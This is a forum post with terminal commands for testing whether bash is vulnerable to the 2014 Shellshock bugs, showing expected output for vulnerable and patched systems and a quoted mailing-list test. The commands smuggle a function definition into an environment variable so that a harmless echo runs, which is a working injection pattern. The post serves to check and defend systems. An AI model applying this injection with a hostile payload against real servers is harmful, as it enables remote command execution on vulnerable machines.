### OLD SH**. read first post ###
to test if system is vulnerable do in terminal
( in code examples ">" is the prompt in a terminal )
1. Attack vector alphaCode: Select all
> env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
If you get "vulnerable" message above then system is just that
safe system:
Code: Select all
> env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
2. Attack vector betaCode: Select all
> env X='() { (a)=>\' sh -c "echo date"; cat echo
sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
Thu Sep 25 21:13:13 CEST 2014
if you get the date at the bottom you're vulnerable
safe system:
Code: Select all
> env X='() { (a)=>\' sh -c "echo date"; cat echo
sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
date
cat: echo: No such file or directory
3. Attack vector gammaCode: Select all
> bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
if you don't get the vulnerable message your system is OK
3. Attack vector thetaCode: Select all
> for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
if you don't get the vulnerable message your system is OK
taken from
http://lists.gnu.org/archive/html/bug-b ... 00238.html------------8<----------------------------------------------------------------------------------------
So, to FULLY test whether you are still vulnerable to ShellShock, we
must come up with a test that proves that NO possible function body
assigned to a valid shell variable name can EVER cause bash to invoke
the parser without your consent. For that, I use this (all on one line,
even if my mailer wrapped it):
Code: Select all
> bash -c "export f=1 g='() {'; f() { echo 2;}; export -f f; bash -c 'echo \$f \$g; f; env | grep ^f='"
which is sufficient to test that both normal variables and functions can
both be exported, AND show you whether there is a collision in the
environment. Ideally, you would see the following result (immune to
shell-shock):
1 () {
2
f=1
--------------------------------------------------------------------------------------->8---------------